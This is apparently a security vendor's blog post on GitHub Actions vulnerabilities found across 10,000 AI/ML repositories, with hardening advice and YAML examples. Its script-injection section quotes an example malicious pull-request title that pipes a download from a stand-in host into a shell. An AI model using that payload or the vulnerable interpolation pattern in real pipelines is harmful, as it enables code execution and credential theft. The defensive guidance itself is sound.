Executive Summary

Analysis of 10,000 open-source AI/ML repositories reveals 70% have critical or high-severity vulnerabilities in GitHub Actions workflows, making them prone to attacks like code injection, credential theft, or repo takeover via malicious PRs.



Top Issues (Prevalence):

- Unpinned third-party actions: 68.4% (easy supply chain attacks on model uploads/training).

- Over-privileged GITHUB_TOKEN: 42.7% (unnecessary write access enables poisoning models/releases).

- Script/command injection: 34.1% (exploits PR titles/bodies to steal tokens like HF_TOKEN).

- Unsafe triggers: 27.2% (run untrusted fork code with full permissions).

- Hard-coded/leaked secrets: 22.8% (exposes cloud creds for datasets/GPUs).

Mitiga Labs recommends a series of mitigations that harden your workflows and reduce your attack surface. Read on to learn how.

Accelerating AI development and attacks with GitHub Actions

GitHub Actions has become the de facto automation engine for the entire AI development lifecycle: dataset preprocessing, distributed training on GPUs, model evaluation, artifact registration (Hugging Face, Weights & Biases, MLflow), container building, and automated deployment to inference endpoints.

While this level of automation accelerates research and production, it also turns every workflow file (‘.github/workflows/*.yml’) into a high-privilege attack surface. A single compromised third-party action or a subtle injection flaw can lead to theft of private datasets, backdooring of released models, or full repository takeover.

To quantify the real-world risk, Mitiga Labs conducted a large-scale static analysis across 10,000 publicly accessible AI and machine learning repositories (selected via GitHub topics such as ‘machine-learning,’ ‘deep-learning,’ ‘pytorch,’ ‘tensorflow,’ ‘llm,’ ‘transformers,’ ‘diffusion,’ ‘computer-vision,’ etc.). We parsed and evaluated every workflow file against known classes of GitHub Actions vulnerabilities.

The results are sobering: 70% of these 10,000 AI/ML repositories contain at least one workflow with a critical or high-severity issue. In many cases, a single malicious pull request from a fork would be sufficient to achieve remote code execution with repository write permissions.

Top 5 Vulnerability Classes in AI/ML Workflows (Ranked by Prevalence)

Prevalence Breakdown (10,000 AI/ML Repositories)

1. Always Pin Actions to Full Commit SHAs

Example:

    uses: actions/checkout@2541b1294d2704b0964813337f33b291d3f8596b # Good: full commit SHA, immutable
    uses: actions/checkout@v4 # Dangerous: mutable tag that can be moved to different code

Automate updates with Dependabot or Renovate, both of which can keep SHA-pinned actions current. Add ‘actions/dependency-review-action’ to flag risky dependency changes in pull requests.
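As a minimal sketch of the Dependabot side of that automation, the configuration below assumes it is saved as `.github/dependabot.yml` in the repository root. The weekly interval is an illustrative choice, not something the analysis prescribes.

```yaml
# .github/dependabot.yml (assumed location)
version: 2
updates:
  # Ask Dependabot to open pull requests when actions referenced
  # in .github/workflows have newer releases.
  - package-ecosystem: "github-actions"
    directory: "/"          # "/" covers the default workflows directory
    schedule:
      interval: "weekly"    # illustrative; pick a cadence that suits the team
```

Each resulting pull request should still be reviewed like any other dependency change before it is merged.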

2. Enforce Explicit Least-Privilege Permissions

Start every workflow with:

    permissions: read-all

    # OR explicitly:

    permissions:
      contents: read
      pull-requests: write # only if you comment/label

For jobs that truly need write access, isolate them in a separate workflow with required approvals.
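One way to sketch that isolation is a separate, manually triggered workflow whose single job is gated by a protected environment. The file name, the `model-release` environment (assumed to have required reviewers configured in the repository settings), and the publish script are all hypothetical placeholders.

```yaml
# Hypothetical file: .github/workflows/publish-model.yml
name: publish-model
on:
  workflow_dispatch:             # manual trigger only; fork pull requests cannot start it

permissions: {}                  # workflow-level default: no permissions at all

jobs:
  publish:
    runs-on: ubuntu-latest
    environment: model-release   # assumed environment with required reviewers
    permissions:
      contents: write            # the only write scope this job is granted
    steps:
      - uses: actions/checkout@2541b1294d2704b0964813337f33b291d3f8596b
      - name: Publish release artifacts
        run: ./scripts/publish.sh   # placeholder for the real publish step
```

Keeping the write-capable job in its own file means the everyday CI workflows can stay read-only.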

3. Eliminate Script Injection Vectors

- Never concatenate untrusted inputs directly into shell commands.

- Use environment variables with proper quoting or dedicated actions.

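- Prefer ‘actions/github-script’ (pinned to a commit SHA like any other action), reading values from its ‘context’ object or from environment variables instead of interpolating them into the script string.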
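The environment-variable pattern from the list above can be sketched as follows. The workflow and job names are illustrative. The commented-out step shows the kind of interpolation to avoid, because the expression is expanded into the script text before the shell ever runs.

```yaml
name: pr-title-check
on: pull_request

permissions:
  contents: read

jobs:
  check-title:
    runs-on: ubuntu-latest
    steps:
      # Vulnerable pattern (do not use): a title such as  "; curl evil.example | sh; "
      # would become part of the shell script itself.
      # - run: echo "Title: ${{ github.event.pull_request.title }}"

      - name: Print PR title safely
        env:
          # The untrusted value is passed as data through the environment.
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: |
          # Quoted expansion: the shell treats the title as one string, not as code.
          printf 'Title: %s\n' "$PR_TITLE"
```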

4. Replace or Harden Dangerous Triggers

- Prefer ‘pull_request’ over ‘pull_request_target’ whenever possible.

- If ‘pull_request_target’ is unavoidable (e.g., testing on self-hosted GPU runners), never check out ‘${{ github.event.pull_request.head.sha }}’ automatically.
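As a rough sketch of a hardened ‘pull_request_target’ workflow, the example below only comments on the pull request and never checks out or runs fork code. The workflow name and comment text are illustrative, and it assumes the `gh` CLI is available on the runner, as it is on GitHub-hosted images.

```yaml
name: pr-triage
on:
  pull_request_target:
    types: [opened]

permissions:
  pull-requests: write   # needed only to post the comment

jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      # Deliberately no actions/checkout step: fork code is never fetched or executed.
      - name: Comment on the pull request
        env:
          GH_TOKEN: ${{ github.token }}
          PR_NUMBER: ${{ github.event.pull_request.number }}
        run: |
          gh pr comment "$PR_NUMBER" \
            --repo "$GITHUB_REPOSITORY" \
            --body "Thanks for the contribution. A maintainer will review it shortly."
```

Anything that must build or test the contributed code belongs in a plain ‘pull_request’ workflow, which runs without secrets and with a read-only token for forks.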

5. Modern Secrets Handling

- Switch to OpenID Connect (OIDC) for AWS/GCP/Azure. No long-lived secrets are needed.

- Never pass secrets to steps running on untrusted code (forks).

- Enable GitHub’s built-in secret scanning and push protection.
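For the OIDC recommendation, a minimal AWS-flavored sketch might look like the following. The role ARN, account ID, region, and workflow name are hypothetical, `<full-commit-sha>` is a placeholder to replace with a reviewed commit of the action, and the example assumes an IAM role that already trusts GitHub's OIDC provider.

```yaml
name: train-on-aws
on:
  push:
    branches: [main]       # trusted branch only; fork pull requests never reach this job

permissions:
  id-token: write          # lets the job request an OIDC token
  contents: read

jobs:
  train:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@2541b1294d2704b0964813337f33b291d3f8596b
      - name: Obtain short-lived AWS credentials
        uses: aws-actions/configure-aws-credentials@<full-commit-sha>  # placeholder SHA
        with:
          role-to-assume: arn:aws:iam::123456789012:role/example-training-role  # hypothetical
          aws-region: us-east-1                                                  # hypothetical
      - name: Confirm the assumed identity
        run: aws sts get-caller-identity
```

No cloud credential is stored in repository secrets here; the credentials issued to the job are temporary and expire on their own.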

Even with these mitigations in place, risk persists. Attackers these days don’t need zero-days. In AI pipelines, the easiest entry points are often workflow misconfigurations, unpinned third-party actions, or leaked secrets. GitHub Actions can turn automation into an attack surface. Writing secure YAML helps defend these pipelines, but it isn’t enough. Defense also requires visibility, timeline reconstruction, and real-time breach prevention when controls fail.

Harden your workflows, but know their limits

In the AI ecosystem, a compromised workflow can go beyond mere stolen code. It can mean stolen proprietary models, tampered training data, or millions in unauthorized cloud spend. Several high-profile AI repository compromises in 2024–2025 were enabled by exactly these patterns, so we’re no longer operating in the realm of the theoretical.

Given this recent history, hardening your GitHub Actions is not optional. Treat every third-party action as untrusted code, every untrusted input as malicious, and every default permission as a potential breach. Implementing the mitigations above substantially reduces the attack surface while adding very little friction to legitimate development.

But when those controls fail, and eventually something does fail, you will need more than hygiene. You need to decode attacks in real time, trace their movement across workflows, and stop them before they matter.

Secure your pipelines today, because tomorrow someone else might be running code in them.

LAST UPDATED: December 9, 2025
